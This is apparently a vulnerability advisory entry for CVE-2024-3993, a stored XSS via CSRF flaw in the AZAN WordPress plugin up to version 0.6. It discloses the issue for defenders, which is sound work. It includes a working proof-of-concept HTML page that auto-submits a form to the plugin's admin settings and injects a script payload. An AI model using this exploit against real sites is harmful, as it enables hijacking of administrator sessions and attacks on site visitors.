Lucene search
Bob MatyasWPEX-ID:19CD60DD-8599-4AF3-99DB-C42DE504606CHistoryMay 24, 2024 - 12:00 a.m.
AZAN Plugin <= 0.6 - Stored XSS via CSRF
2024-05-2400:00:00
Bob Matyas
24
azan plugin
stored xss
csrf
admin
html
exploit
AI Score
5.9
Confidence
High
Description The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()"><form action="http://example.com/wp-admin/options-general.php?page=azan" method="post"><input type="hidden" name="azan-lat" value="1" /><input type="hidden" name="azan-lng" value="2" /><input type="hidden" name="azan_custom_cities" value='csrf<script>alert(999)</script>,2,2,3' /><input type="hidden" name="azan-city" value="32" /><input type="submit" value="Submit" /></form></body>
```
If the widget is loaded on a page, the XSS will triggerRelated
cvelist
cvelist
CVE-2024-3993 AZAN Plugin <= 0.6 - Stored XSS via CSRF
2024-06-14 06:00:04
nvd
nvd
CVE-2024-3993
2024-06-14 06:15:12
wpvulndb
wpvulndb
AZAN Plugin <= 0.6 - Stored XSS via CSRF
2024-05-24 00:00:00
cve
cve
CVE-2024-3993
2024-06-14 06:15:12
vulnrichment
vulnrichment
CVE-2024-3993 AZAN Plugin <= 0.6 - Stored XSS via CSRF
2024-06-14 06:00:04
wordfence
wordfence